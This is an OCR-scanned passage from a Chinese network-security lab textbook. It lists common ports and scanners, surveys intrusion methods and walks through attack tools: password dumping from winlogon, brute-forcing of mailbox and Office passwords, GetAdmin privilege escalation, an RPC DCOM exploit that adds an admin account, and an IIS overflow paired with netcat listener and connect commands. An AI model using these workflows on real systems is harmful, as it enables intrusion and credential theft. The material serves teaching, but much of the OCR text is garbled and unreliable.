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£3 易 优 软件 一 超级 字典 生成 器 V3. 35 


图 6-6 Superdic 界面 


CI 易 优 软件 一 起 级 宝典 生成 瑟 _Y3. 35 
关于 。 基本 字符 | 自 定义 | 生日 。| 生成 字典 | 修改 字典 | 注册 | 


数 vivovsiva4lvsiveiv:ivsivsivo 清空 


$8 Vaks ECCEDERE ier ivcivkxivrivy Hm 
lexíivrLtivemivNivolv?rivoalvkies ivt 
vvivvivtivxiet 


6 选择 的 字符 


享 , 及 C$ 、D$ 、IPC$ 、Admin $ 等 ,这 一 种 共享 需要 管理 员 权 限 ,通常 对 个 人 主机 填 
administrator, 密 码 为 空 ,成 功 希 望 很 大 ,工具 软件 的 主 界面 如 图 6-8 所 示 , 具 体 使 用 步骤 请 
参考 第 9 章 实验 十 七 。 

4. PortScan 开放 端口 扫描 

通过 该 工具 可 以 扫描 常用 的 端口 和 指定 的 端口 是 否 开 放 , 如 图 6-9 所 示 , 具 体 使 用 步骤 
请 参考 第 9 章 实 验 十 八 。 

代理 服务 器 常用 以 下 端口 : 

HTTP 协议 代理 服务 器 常用 端口 号 : 80/8080/3128/8081/9080; 

Socks 代理 协议 服务 器 常用 端口 号 : 1080; 

FTP( 文 件 传输 ) 协 议 代理 服务 器 常用 端口 号 : 21; 

Telnet( 远 程 登录 ) 协 议 代 理 服务 器 常用 端口 : 23; 

HTTP 服务 器 ,默认 的 端口 号 为 80/tcp( 木 马 Executor 开放 此 端口 ); 
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S Shed 1.01 http://keir. net 


Ath IP: [192 168 .1 - 1 
fub Ir: [192 168 . 1 .255 域名 >IFP QL) | 


[x saco mro 验证 扫描 


选项 四 ) XTW 


6-8 Shed 共享 目录 扫描 


IP 
due |192 168 .1 1 {øR [192 168 1 255 


-NIIR 


图 6-9 扫描 端口 软件 


HTTPS(securely transferring web pages) 服 务 器 ,默认 的 端口 号 为 443/tcp、443/udp; 
Telnet( 不 安全 的 文本 传送 ) ,默认 端口 号 为 23/tcp( 木 马 Tiny Telnet Server 所 开放 的 
端口 ); 


FTP, 上 默认 的 端口 号 为 21/tep (木马 Doly Trojan, Fore, Invisible FTP, WebEx 
WinCrash 和 Blade Runner 所 开放 的 端口 ); 


TFTP(Trivial File Transfer Protocol) ,默认 的 端口 号 为 69/udp; 
SSH( 安 全 登录 ) .SCP( 文 件 传输 )、 端 口 重 定向 ,默认 的 端口 号 为 22/tcp; 
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SMTP (Simple Mail Transfer Protocol) (E-mail) , 默认 的 端口 号 为 25/tcp (木马 
Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, WinPC, WinSpy 都 开放 
这 个 端口 ); 

POP3(Post Office Protocol) (E-mail) ,默认 的 端口 号 为 110/tcp; 

Windows 2003 远程 登陆 ,默认 的 端口 号 为 3389; 

Symantec AV/Filter for MSE ,默认 端口 号 为 8081; 

Oracle 数据 库 ,默认 的 端口 号 为 1521; 

Oracle EMCTL, 默 认 的 端口 号 为 1158; 

Oracle XDBCXML 数据 库 ) ,默认 的 端口 号 为 8080; 

Oracle XDB FTP 服务 ,默认 的 端口 号 为 2100; 

MS SQL * SERVER 数据 库 server ,默认 的 端口 号 为 1433/tcp 1433/udp; 

MS SQL* SERVER 数据 库 monitor, 默 认 的 端口 号 为 1434/tcp 1434/udp; 

QQ ,默认 的 端口 号 为 1080/udp。 


6.5.2 主动 式 策略 扫描 


主动 式 策略 是 基于 网 络 的 , 它 通过 执行 一 些 脚本 文件 模拟 对 系统 进行 攻击 的 行为 并 记 
录 系 统 的 反应 ,从 而 发 现 其 中 的 漏洞 。 利 用 被 动 式 策略 的 扫描 称 为 系统 安全 扫描 ,利用 主动 
式 策略 的 扫描 称 为 网 络 安全 扫描 。 

1. 漏洞 扫描 X-Scan-V3.3 

采用 多 线程 方式 对 指定 TP 地 址 段 (或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功能 ,提供 了 
图 形 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包 括 : 远程 操作 系统 类 型 及 版 本 ,标准 端口 状态 
及 端口 BANNER 信息 , CGI 漏洞 , IIS 漏洞 ,RPC 漏洞 , SQL-SERVER, FTP-SERVER, 
SMTP-SERVER,POP3-SERVER, NT-SERVER 弱 口 令 用 户 ,NT 服务 器 NeTBios 信息 
等 ,如 图 6-10 所 示 。 扫 描 结 果 保 存在 /log/ 目 录 中 ,index_*. htm 为 扫描 结果 索引 文件 , 扫 
描 结 果 如 图 6-11 所 示 。 上 有 具体 使 用 步骤 请 参考 第 9 章 实 验 十 九 。 
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Æ 6-10 X-Scan 扫描 的 设置 
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加 加 192.168.1.5. Windows NT 


AeBI"192. 168. 1.5" 
[192. 168. 1.5]: EEM ISNA” 
[192. 1658.1.5] ;正在 检测 "MTTP 重 定向 情 误 页 面 ” 
182. 168. 1.5] TS 漏洞 


图 6-11 扫描 的 结果 


2. 网 络 监听 

网 络 监听 是 一 种 监视 网 络 状态 .数据 流程 以 及 网 络 上 信息 传输 的 管理 工具 , 它 可 以 将 网 
络 界面 设 定 成 监听 模式 ,并且 可 以 截获 网 络 上 所 传输 的 信息 。 也 就 是 说 , 当 黑 客 登 录 网 络 主 
机 并 取得 超级 用 户 权限 后 , 若 要 登录 其 他 主机 ,使 用 网 络 监听 便 可 以 有 效 地 截获 网 络 上 的 数 
据 , 这 是 黑客 使 用 的 最 好 的 方法 。 但 是 网 络 监听 只 能 应 用 于 连接 同一 网 段 的 主机 ,通常 被 用 
来 获取 用 户 密码 等 。 

网 络 监听 的 工具 有 很 多 ,例如 前 面 讲 过 的 Sniffer、Wireshark 等 ,下 面 是 一 款 可 以 运行 
在 Windows 2003. Windows XP,Windows 7 上 的 网 络 监听 工具 ,是 让 用 户 查 看 自己 当前 正 
在 访问 哪些 网 络 资源 ,或 者 查看 哪些 人 在 攻击 本 台 计 算 机 的 工具 ,软件 界面 整洁 ,一 切 信息 
一 目 了 然 , 如 图 6-12 所 示 。 

3. SuperScan 百 端口 扫描 器 


打开 主 界面 ,默认 为 扫描 (Scan) 菜 单 , 允 许 你 输入 一 个 或 多 个 主机 名 或 IP 范围 。 你 也 
可 以 选 文件 下 的 输入 地 址 列表 。 输 入 主机 名 或 IP. 范围 后 开始 扫描 , 单 击 左下 角 执 行 按钮 ， 
SuperScan 开始 扫描 地 址 ,扫描 进程 结束 后 ,SuperScan 将 提供 一 个 主机 列表 ,关于 每 台 扫 描 
过 的 主机 被 发 现 的 开放 端口 信息 。SuperScan 还 有 选择 以 HTML 格式 显示 信息 的 功能 ,如 
图 6-13 所 示 ,具体 使 用 步骤 请 参考 第 9 章 实 验 二 十 。 

SuperScan 具有 以 下 功能 : 

。 通 过 ping 来 检验 IP 是 否 在 线 

。 IP 和 域名 相互 转换 

。 检验 目标 计算 机 提供 的 服务 类 别 

。 检验 一 定 范围 目标 计算 机 的 是 否 在 线 和 端口 情况 
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网 络 监听 工具 界面 


* SuperScan 4.0 
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hosts discovered 
TCP ports 
UDP porta 


Performing banner grabs 
TCP banner grabbing (0 ports 
UDP banner grabbing (0 ports 

Reporting scan results. 

- Scan done 


Discovery scan finished: 04/20/14 09:38:05 


图 6-13 SuperScan 扫描 界面 


116 计算 机 网 络 安 全 与 实验 教程 


。 工具 自 定义 列表 检验 目标 计算 机 是 否 在 线 和 端口 情况 

。 自 定 义 要 检验 的 端口 ,并 可 以 保存 为 端口 列表 文件 

软件 自 带 一 个 木马 端口 列表 trojans. lst, 通 过 这 个 列表 我 们 可 以 检测 目标 计算 机 是 否 
有 木马 。 同 时 ,我 们 也 可 以 自己 定义 修改 这 个 木马 端口 列表 。 


6.6 网 络 人 侵 


6.6.1 网 络 入 侵 行为 分 析 
网 络 人 侵 威胁 归 类 来 源 主要 分 三 大 类 ,包括 : 
CD 物理 访问 : 指 非法 用 户 能 接触 机 器 , 坐 在 了 计算 机 面前 ,可 以 直接 控制 终端 乃至 整 
个 系统 。 
(2) 局 域 网 内 用 户 威胁 : 一 般 指 局 域 网 内 用 户 ,具有 一 般 权 限 后 对 主机 进行 非法 访问 。 
(3) 远程 人 侵 : 外 部 人 员 通 过 Internet 远程 非法 访问 主机 获取 非法 权限 。 
6.6.2 网 络 入 侵 方 法 


网 络 人 侵 方 法 的 方法 有 很 多 ,归纳 起 来 有 以 下 的 18 种 方法 。 

1. 拒绝 访问 

进攻 者 用 大 量 的 请 求 信息 冲击 网 站 ,从 而 有 效 地 阻塞 系统 ,使 运行 速度 变 慢 ,甚至 网 站 
崩溃 。 这 种 使 计算 机 过 载 的 方法 常常 被 用 来 掩盖 对 网 站 的 和 人 侵 。 

2. 扫描 器 

通过 广泛 地 扫描 因特网 来 确定 计算 机 、 服 务 器 和 连接 的 类 型 。 恶 意 的 人 常常 利用 这 种 
方法 来 找到 计算 机 和 软件 的 薄弱 环节 并 加 以 利用 。( 建 议 看 看 用 户 账 户 , 看 有 没有 其 他 的 用 
户 建立 。 然 后 直接 使 用 Administrator 账户 ,如 若 不 用 的 话 或 者 用 都 要 给 加 上 密码 ) 。 

3. 嗅觉 器 

这 种 软件 暗中 搜寻 正在 网 上 传输 的 个 人 网 络 信 息 包 ,可 以 用 来 获取 密码 甚至 整个 信息 
包 的 内 容 。 

4. 网 上 欺骗 

伪造 电子 邮件 ,用 它们 哄骗 用 户 输入 关键 信息 ,如 邮箱 账号 、 个 人 密码 或 信用 卡 等 。 

5. 特洛伊 木马 

这 种 程序 包含 有 探测 一 些 软 件 弱 点 所 在 的 指令 ,安装 在 计算 机 上 ,用 户 一 般 很 难 察觉 。 

6. 后 门 

黑客 为 了 防止 原来 进入 的 通道 被 察觉 ,开发 一 些 隐蔽 的 进入 通道 (我 们 俗称 的 后 门 ) ,使 
重新 进入 变 得 容易 ,这些 通道 是 难以 被 发 现 的 。 

7. 恶意 小 程序 

这 是 一 种 微型 程序 ,有 时 用 Java 语言 写成 . 它 能 够 使 用 计算 机 资源 ,修改 硬盘 上 的 文 
件 , 发 出 伪造 的 电子 邮件 以 及 偷窃 密码 。 
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8. 进攻 拨号 程序 

这 种 程序 能 够 自动 地 拨 出 成 千 上 万 个 电话 号 码 , 用 来 搜寻 一 个 通过 调制 解 调 器 连接 的 
进入 通道 。 

9. 逻辑 炸弹 

逻辑 炸弹 是 嵌入 计算 机 软件 中 的 一 种 指令 , 它 能 够 触发 对 计算 机 的 恶意 操作 。( 没 有 什 
么 实际 功能 ,一 般 是 在 正常 文件 里 ) 

10. 密码 破解 

入 侵 者 破解 系统 的 登录 密码 或 管理 密码 及 其 他 一 些 关 键 口令 。( 密 码 难 度 加 强 ,建议 
18 位 的 混合 密码 ) 

11. 社交 工程 

这 种 策略 是 通过 与 没有 戒心 的 公司 雇员 交谈 ,从 中 得 到 有 价值 的 信息 ,从 而 获得 或 猜 出 
对 方 网 络 的 漏洞 (如 猜 出 密码 ) ,进而 控制 公司 计算 机 系统 。( 社 交工 程 属 于 人 为 行为 ,一 定 
不 要 泄露 ) 

12. 垃圾 搜寻 

通过 对 一 家 公司 垃圾 的 搜寻 和 分 析 , 获 得 有 助 于 冶 人 这 家 公司 计算 机 系统 的 有 用 信息 。 
这 些 信 息 常 常 被 用 来 证 实在 “社交 工程 ”中 刺探 到 的 信息 。( 第 一 时 间 删 除 垃 圾 ) 

13. 系统 漏洞 

这 是 很 实用 的 攻击 方式 。 入 侵 者 利用 操作 系统 漏洞 ,可 以 很 轻易 地 进入 系统 主机 并 获 
取 整 个 系统 的 控制 权 。( 建 议 使 用 正版 系统 ,定时 更 新 和 修补 漏洞 ) 

14. 应 用 程序 漏洞 

应 用 程序 漏洞 与 上 述 系统 漏洞 的 方式 相似 ,也 可 能 获取 整个 系统 的 控制 权 。 

15. 配置 漏洞 

配置 漏洞 通常 指 系统 管理 员 本 身 的 错误 。 

16. 协议 /设计 漏洞 

协议 /设计 漏洞 指 通信 协议 或 网 络 设 计 本 身 存 在 的 漏洞 ,如 Internet 上 广泛 使 用 的 基本 
通信 协议 一 一 TCP/IP, 本 身 设计 时 就 存在 一 些 缺 陷 。 

17. 身份 欺骗 

身份 欺骗 包括 用 户 身份 欺骗 和 IP. 地 址 欺骗 ,以 及 硬件 地 址 欺骗 和 软件 地 址 欺骗 。( 通 
过 适当 的 安全 策略 和 配置 可 以 防止 这 种 攻击 ) 

18. 炸弹 

这 是 利用 系统 或 程序 的 小 毛病 ,对 目标 发 送 大 量 洪水 般 的 报 文 , 或 者 非法 的 会 引起 
系统 出 错 的 数据 包 等 ,导致 系统 或 服务 停止 响应 、 死 机 其 至 重启 系统 的 攻击 。 这 种 方式 
是 最 简单 ,但 是 却 最 有 效 的 一 种 攻击 方式 。 最 近 黑 客 们 攻击 美国 的 各 大 网 站 就 是 用 的 这 
种 方法 。 
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6.7 网 络 人 侵 的 工具 


6.7.1 FindPass 得 到 管理 员 密码 


用 户 登 录 以 后 ,所 有 的 用 户 信息 都 存储 在 系统 的 一 个 进程 中 ,这 个 进程 是 : winlogon. 
exe, 可 以 利用 程序 将 当前 登录 用 户 的 密码 解码 出 来 ,如 图 6-14 所 示 。 


E -o ~i 
ZNO ENO BEV Wb 


98 0:04:55 16 K 
00 0:00:17 272 K 
00 0:00:01 360 K 
00 0:00.02 2,004 K 
00 0:00:02 — 5,044 K 
00 0:00:01 4,756 K 
00 0:00:00 2,168 K 
00 0:00:00 3,176 K 
00 0:00:00 3,29 K 
00 0:00:00 — 4,068 K 
00 0.00.00 — 3,408 K 
00 0:00:00 1,864 K 
00 0:00:00 884 K 
00 0:00:00 1,800 K 
00 0:00:00 — 2,804 K 
00 0:00:00 — 2,264 K 
00 0:00:01 — 2,940 K 
mn mom sam 


6-14 ”任务 管理 器 winlogon 程序 


使 用 FindPass 等 工具 可 以 对 该 进程 进行 解码 ,然后 将 当前 用 户 的 密码 显示 出 来 ,如 
图 6-15 所 示 ,具体 使 用 步骤 请 参考 第 9 章 实 验 二 十 一 。 


:VFindPass -exe 


To Pind Password in the Winlogon process 
Usage: PindPass.exe DomainNane UserName PID-of-MinLogon 


he debug privilege has been added to PassvordReninder. 
he MinLogon process id is 192 (80x8088808cO». 


To find HACKER\adninistrator password in process 19$... 
he encoded password is fo 
he logon information is: |WRCKERZadninistrator/123456- 


he hash byte is: 8x68. 


Pi EWEARE 7E 


图 6-15 FindPass 工具 


6.7.2 GetNTUser 破解 登录 密码 


使 用 6. 5 节 的 字典 文件 ,利用 6. 5 节 介 绍 的 工具 软件 GetNTUser 依然 可 以 将 管理 员 密 
码 破解 出 来 ,密码 为 数字 或 者 是 数字 和 字符 的 混合 , 均 可 以 破解 出 来 ,如 图 6-16 所 示 。 
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fx 无 标题 - GetNTUser 
文件 时) mE IA 帮助 中 
| 加 XxX £614? 


Hane [User ID [Passvord 


BG dinis 


| 字典 测试 Administrator: a10215 


6-16 GetNTUser 破解 用 户 密码 


6.7.3 暴力 破解 邮箱 密码 

邮箱 的 密码 一 般 需要 设置 到 8 位 以 上 ,否则 7 位 以 下 的 密码 容易 被 破解 。 尤 其 7 位 全 
部 是 数字 ,更 容易 被 破解 。 黑 十 邮箱 破解 软件 是 一 个 暴力 破解 器 ,主要 功能 是 用 来 破解 邮箱 
密码 的 。 

软件 在 搜索 可 能 密码 的 时 候 包括 深度 算法 ,广度 算法 ,多 线程 深度 算法 。 

深度 算法 : 这 是 一 种 很 特殊 的 算法 ,如 果 你 位 数 猜 得 准 , 就 可 以 将 时 间 缩 短 30% ~70% 

广度 算法 : 此 算法 CPU 占用 比 深度 算法 多 2% ,速度 快 一 点 , 现 大 多 数 类 似 功能 的 工具 
都 采用 它 ,其 对 短小 密码 (3 位 以 下 ) 非 常 强 ! 

黑 雨 一 POP3 邮箱 密码 暴力 破解 器 ,比较 稳定 的 版 本 是 2. 3.1, 主 界面 如 图 6-17 所 示 。 


E 
I 


kechenaCtekna.com Hip/Ándelo3ine| — 证 税 用 于 硅 法 用 这 Y ANTRAT. SR. EXE 


6-17 黑 雨 邮箱 密码 暴力 破解 器 
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在 实验 中 选择 字典 文件 攻击 ,如 图 6-18 所 示 ,所 以 要 用 到 我 们 前 面 讲 的 Superdic( 超 级 
字典 文件 生成 器 ) ,生成 字典 文件 。 


EE RAUM I E4213 1-3 


C ARFER: z 

F 012...09 Tm abe...yz[ ABC...YZ 

P. r*esx Ont, -. /- ms "ur 
BETUR. G TAY. 


图 6-18 选择 字典 文件 


在 “Pop3 地 址 ”里 输入 邮箱 地 址 ,如 图 6-19 所 示 。 单 击 登陆 Es 确定 邮箱 的 正确 性 。 在 
“Pop3 用 户 名 ?里 输入 破解 的 用 户 名 , 单 击 查看 是 否 有 该 用 户 名 ,如 图 6-20 所 示 。 单 击 广度 
算法 ,这 时 系统 就 开始 搜索 邮箱 的 密码 ,过 一 段 时 间 ,可 以 在 黑 雨 的 主 界面 上 找到 邮箱 的 密 
码 , 如 图 6-21 所 示 。 具 体 使 用 步骤 请 参考 第 9 章 实 验 二 十 二 。 


图 6-19 ”验证 邮箱 是 否 存 在 


6.7.4 暴力 破解 软件 密码 


许多 软件 都 具有 加 密 的 功能 ,比如 Office 文档 、Winzip 文档 和 Winrar 文档 等 等 。 这 些 
文档 密码 可 以 有 效 地 防止 文档 被 他 人 使 用 和 阅读 。 但 是 如 果 密 码 位 数 不 够 长 的 话 ,同样 容 
易 被 破解 。 
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C ARFER: 

Jv 012...89 [^ abe... yz [ ABC... TZ 
T Iss Oen, - /:: e» UI 
c > GFAP 


PH—PornEmME nKAZ 


个 选取 字符 集 : 
F O2 ..99|- de. .yz M AM, yz | GRO — fue mM T 
厂 Ie Oe, -Xe UI | 

3 G 字典 文件 


图 6-21 破解 出 来 的 邮箱 密码 


我 们 使 用 的 工具 软件 ,Advanced Office XP Password Recovery 可 以 快速 破解 Word X 
档 密码 , 主 界面 如 图 6-22 所 示 。 现 在 使 用 的 是 测试 版 的 ,所 以 密码 最 多 为 三 位 的 。 

使 用 时 单 击 工 具 栏 按钮 Open File, 打 开 建 立 的 Word 文档 ,程序 打开 成 功 后 会 在 Log 
Window 中 显示 成 功 打开 的 消息 ,设置 密码 长 度 最 短 是 一 位 ,最 长 是 三 位 , 单 击 工具 栏 开 始 
的 图 标 ,开始 破解 密码 ,大 约 两 秒 钟 后 ,密码 被 破解 了 ,如 图 6-23 所 示 。 具 体 使 用 步骤 请 参 
考 第 9 章 实验 二 十 三 。 


6.7.5 普通 用 户 提升 为 超级 用 户 


有 时 候 , 管 理 员 为 了 安全 ,给 其 他 用 户 建立 一 个 普通 用 户 账号 ,认为 这 样 就 安全 了 。 其 
实 不 然 , 用 普通 用 户 账号 登录 后 ,可 以 利用 工具 GetAdmin. exe 将 自己 加 到 管理 员 组 或 者 新 
建 一 个 具有 管理 员 权 限 的 用 户 。 
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S D:\Program 2790532110 12211772 E172 


File Recovery Internet VBA Backdoor Language Help 


2-39£8489454e€605»54^*5?€0 ool 


Fie Name Type of atack 


n ry * Brutedoece attack O Dictionary attack 
C\Documents and Settings VAcmrisbiato Ai Doc] doc adt nod: 


Brteorce | Dictionary | Auto-save | Options | Benchmark | System ifo 
Bruteloroe options 
Password length options Brute dorce range optione 


[7] All printable. 


Staring password: 
Mask: 


Q 2014242 114112 Recognizing fle tomat 

Q) 2014212114112 Selected fie ie a Microsol Word Document ox Temelale 
Q) 2014242114112  Microsolt Word Version: 97. 2000 or 2002 KPI 

Q 2014212114113 File Doc1 doc successfully opened. 


Password in HEX (unicode) 
D Save in unicode. 


Cow — J( Us 1) 


6-23 ”破解 出 来 的 密码 


利用 Hacker 账户 登录 系统 ,在 系统 中 执行 程序 GetAdmin. exe, 程 序 自动 读 取 所 有 用 
户 列表 ,在 对 话 框 中 单 击 按钮 New, 在 框 中 输入 要 新 建 的 管理 员 组 的 用 户 名 ,输入 一 个 用 户 
名 IAMHacker, 如 图 6-24 所 示 。 然 后 单 击 主 窗口 的 按钮 OK, 出 现 添加 成 功 的 窗口 ,如 图 6-25 


所 示 。 


Y Prvdensgr Breaker by Ska 


en inis 


Em M 


[TsInternetls. 
Wacker 


EAE 
Em User Name- E 
C cem 


un progran in system privilege- 


dee 


Exakation Successfully! 
Please relogon with the user(s) name! 


E 
About x | sit | 


图 6-24 新 建 的 用 户 图 6-25 新 建 用 户 成 功 
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注销 当前 用 户 , 使 用 IAMHacker 登录 ,密码 为 空 , 登 录 后 查看 自己 的 组 就 是 
Administrators. ,属于 超级 用 户 组 了 ,普通 用 户 自 己 就 建立 了 一 个 管理 员 账 号 。 只 要 物理 上 
能 接触 机 器 就 可 以 获得 超级 用 户 的 权限 ,具体 使 用 步骤 请 参考 第 9 章 实验 二 十 四 。 


6.8 缓冲 区 溢出 漏洞 攻击 


6.8.1 缓冲 区 溢出 攻击 


缓冲 区 溢出 是 指 当 计算 机 向 缓冲 区 内 填充 数据 位 数 时 超过 了 缓冲 区 本 身 的 容量 ,溢出 
的 数据 覆盖 在 合法 数据 上 。 理 想 的 情况 是 : 程序 会 检查 数据 长 度 , 而 且 并 不 允许 输入 超过 
缓冲 区 长 度 的 字符 。 但 是 绝 大 多 数 程序 都 会 假设 数据 长 度 总 是 与 所 分 配 的 储存 空间 相 匹 
配 ,这 就 为 缓冲 区 溢出 埋 下 隐患 。 操 作 系 统 所 使 用 的 缓冲 区 ,又 被 称 为 “堆栈 ”, 在 各 个 操作 
进程 之 间 ,指令 会 被 临时 储存 在 堆栈” 当中,“ 堆栈 ”也 会 出 现 缓冲 区 溢出 。 缓 冲 区 溢出 使 目 
标 系 统 的 程序 被 修改 ,经 过 这 种 修改 的 结果 使 系统 产生 一 个 后 门 。 

通过 往 程 序 的 缓冲 区 写 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ， 
使 程序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 这 项 攻击 对 技术 要 求 比较 高 ,但 是 攻击 的 过 
程 却 非常 简单 。 造 成 缓冲 区 溢出 的 原因 是 程序 中 没有 和 仔细 检查 用 户 输入 的 参数 。 例 如 下 面 
程序 : 

void function(char * str) ( 

char buffer[16]; strcpy(buffer, str); 

) 

上 面 的 strcpy() 将 直接 把 str 中 的 内 容 copy 到 buffer 中 。 这 样 只 要 str 的 长 度 大 于 
16, 就 会 造成 buffer 的 溢出 ,使 程序 运行 出 错 。 存 在 像 strepy 这 样 的 问题 的 标准 函数 还 有 
strcat() ,sprintfO ,vsprintf() „gets scanf() 等 。 

缓冲 区 溢出 攻击 之 所 以 成 为 一 种 常见 的 安全 攻击 手段 其 原因 在 于 缓冲 区 溢出 漏洞 太 普 
遍 了 ,并 且 易 于 实现 。 而 且 , 缓 冲 区 溢出 成 为 远程 攻击 的 主要 手段 其 原因 在 于 缓冲 区 溢出 漏 
洞 给 予 了 攻击 者 植 人 并 且 执 行 攻击 代码 机 会 。 被 植 入 的 攻击 代码 以 一 定 的 权限 运行 有 缓冲 
区 溢出 漏洞 的 程序 ,从 而 得 到 被 攻击 主机 的 控制 权 。 


6.8.2 利用 RPC 漏洞 建立 超级 用 户 


远程 过 程 调用 RPC(Remote Procedure Call) ,是 操作 系统 的 一 种 消息 传递 功能 ,允许 应 
用 程序 呼叫 网 络 上 的 计算 机 。 当 系统 启动 的 时 候 ,自动 加 载 RPC 服务 。 可 以 在 服务 列表 中 
看 到 系统 的 RPC 服务 ,如 图 6-26 所 示 。 

RPC 溢出 漏洞 .必须 打 专 用 补丁 。 利 用 工具 scanms. exe 文件 检测 RPC 漏洞 ,运行 在 
命令 行 下 用 来 检测 指定 IP 地 址 范围 内 机 器 是 否 已 经 安装 了 补丁 程序 ,如 果 没 有 安装 补丁 程 
序 , 该 IP 地 址 就 会 显示 出 LVVLN], 如 图 6-27 所 示 。 

如 果 我 们 检测 到 有 RPC 溢出 漏洞 ,就 可 以 用 attack. exe 对 目标 进行 机 器 进行 溢出 攻 
击 , 并 添加 用 户 名 /密码 为 : qing10/qing10 的 管理 员 账 号 ,并 终止 对 方 的 RPC 服务 。 
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6-26 系统 的 服务 列表 


中 的 卷 役 有 标签。 
卷 的 序列 号 是 B45F-6669 


C:、 的 目录 


<DIR> FOUND. 888 

XDIR» WINNT 

«DIR» Documents and Settings 
«DIR» Progran Files 

<DIR> 


ru 
目录 3.008.778.2408 JAF 


C:Oscanms 192.168.1.5 
一 ScanĦMs Tool — <c) 2003 Internet Security Systems 一 一 
Scans for systems vulnerable to MS83-826 vuln 

More accurate for WinXP/Win2k, less accurate for WinNT 
ISS provides no warrantees for any purpose 

Use at own risk. Runs best from WinXP. 

IP Address REMACT SYSACT DCOM Version 


192.168.1.5 [VULN] [VULN] 5.6 


C: 


图 6-27 检查 RPC 漏洞 
新 建 用 户 的 用 户 名 和 密码 都 是 qing10, 这 样 就 可 以 登录 对 方 计算 机 了 。RPC 服务 停 
,操作 系统 将 有 许多 功能 不 能 使 用 ,非常 容易 被 管理 员 发 现 ,使 用 工具 软件 OpenRpcSs. 
exe 来 给 对 方 重启 RPC 服务 ,攻击 的 全 过 程 如 图 6-28 所 示 , 具 体 使 用 步骤 请 参考 第 9 
验 二 十 五 。 


to 
e 


Jattack 192.168.1.5 


[- Remote DCOM RPC Buffer Overflou Exploit 
Original code by PlashSky and Benjurry 
Rewritten by qing1918 <http://www.ercist.com. 

- modified by qinglB1Beercist.iscas-ac-cn 


se \\192.168.1.5\ipc$ qing19 /user:qing10 
， 不 是 内 部 或 外 部 命令 ， 世 不 是 可 运行 的 程序 
或 批 处 理 文件 。 


Jnet use \\192.168.1.5\ipc$ qing1@ /us ingi8 


令 成 功 完成 。 


|C: \>openrpcss \\192.168.1.5 


Remote RpcSs Configure, by qingi818 
nail: qingiBi8Bercist.iscas.ac.cn 


fullyt 
e Procedure Call (RPC) service. 

dure Call (RPC) service is started successfully? 
e Call <RPC) ce is running 


lsinsleteyyyYuery goodttha.. .ha...ha... 


Disconnecting server...Successfull 


Ic: s». 


图 6-28 利用 RPC 漏洞 建立 用 户 


6.8.3 利用 IIS 溢出 进行 攻击 


1. snake 和 nc 工具 的 第 一 种 组 合 

利用 IISCInternet Information Server) 溢 出 进行 攻击 ,利用 软件 Snake IIS 溢出 工具 可 
以 让 对 方 的 IIS 溢出 ,还 可 以 捆绑 执行 的 命令 和 在 对 方 计 算 机 上 开 
面 如 图 6-29 所 示 。 


mA iol xi 


被 攻击 地 址 wx 
I E o EL 
Igi 
BR 
C KB/s, 主动 连接 到 I?/Port 
mp [755i 
S hdi vac mae 
C RHE E— TA CHESRE Q) 
EROA B13 
Sepe 


[end eze Je direi 


Snn EILA, 请 二 知道 后 日 的 请 况 下 使 用 ， 因 为 ， 一 苛 后 村， 将 全 由 你 未 承担 1 
一 by snake. (http.//snakel2 top263. net) 


图 6-29 Snake IIS 工具 主 界面 
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该 软件 适用 于 各 种 类 型 的 操作 系统 ,比如 对 192. 168. 1. 5 进行 攻击 ,没有 安装 补丁 程 
序 ,攻击 完毕 后 ,开辟 一 个 813 端口 ,并 在 对 方 计算 机 上 执行 命令 “dir c:\”。 单 击 按钮 “IDQ 
溢出 ”, 出 现 攻 击 成 功 的 提示 框 ,这 个 时 候 ,813 端口 已 经 开放 ,利用 工具 软件 nc. exe 连接 到 
该 端口 ,将 会 自动 执行 刚才 发 送 的 DOS 命令 “dir c:\”, 使 用 的 语法 是 : nc. exe -vv 172. 18. 
25.109 813, 其 中 -vv 是 程序 的 参数 ,813 是 目标 端口 ,可 以 看 到 命令 的 执行 结果 。 

2. snake 和 nc 工具 的 第 二 种 组 合 

下 面 利用 nc. exe 和 snake 工具 的 另外 一 种 组 合 和 人 侵 对 方 计算 机 。 首 先 利 用 ne. exe dir 
令 监 听 本 地 的 813 端口 。 使 用 的 基本 语法 是 : nc -l -p 813 ,执行 的 过 程 如 图 6-30 所 示 。 这 
个 窗口 就 这 样 一 直 保留 。 


:Nonc -1 -p 813 


6-30 监听 本 地 端口 


启动 工具 软件 snake, 输 入 要 攻击 的 IP 地 址 和 本 机 的 IP 地 址 ,端口 是 813 ,设置 好 以 
后 , 单 击 按钮 “IDQ 溢出 ”, 查 看 nc 命令 的 DOS 框 , 在 该 界面 下 ,已 经 执行 了 设置 的 DOS 命 
令 。 将 对 方 计算 机 的 C 盘 根 目 录 列 出 来 ,如 图 6-31 所 示 。 如 果 没 有 反应 , 按 Ctrl 十 C 显示 。 


CA\WINNT\ System3z\cmd.ewe - ne -| -p B13 


|c:Vonc -1 3 813 

驱动 器 c 中 的 卷 没 有 标签 。 

卷 的 序列 号 是 B45F-666 

c:\ 的 目录 
[2002-10-19 04:45 <DIR> WINNT 

002-10-19 04:50 <DIR> Documents and Settings 

002-10-19 04:51 «DIR» Program Files 
{2002-10-19 05:01 «DIR» Inetpub 
{2003-11-04 21:31 «DIR» passdump 
[2003-11-04 21:32 «DIR» Pass 
{2003-11-04 21:35 «DIR» HuperSnap-DX 4 
[2003-11-09 18:30 155,711 proj3 14.exe 
[2003-11-06 10:40 73,780 findpass.exe 
[2003-11-10 15:30 65,600 UDP Seruer.exe 
|2003-11-10 15:50 65,600 TCP Seruer.exe 
1999-12-20 23:58 55,296 pulist.exe 
{2002-05-25 22:34 15,872 GetAdmin.exe 
{2002-05-25 01:15 18,944 starAPI.dll 
[2003-11-04 21:52 «DIR» 9x 
{2003-11-04 21:51 «DIR» attack 

7 个 文件 450,803 FË 
9 个 目录 2.269,295,592 可 用 字 节 

r. 


6-31 获取 对 方 计 算 机 的 目录 列表 
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两 种 组 合 的 具体 使 用 步骤 请 参考 第 9 章 实 验 二 十 六 。 


6.9 其 他 漏洞 攻击 


6.9.1 SMB 致命 攻击 


SMB(Session Message Block, 会 话 消息 块 协议 ) 又 叫做 NetBios 或 LanManager 协议 ， 
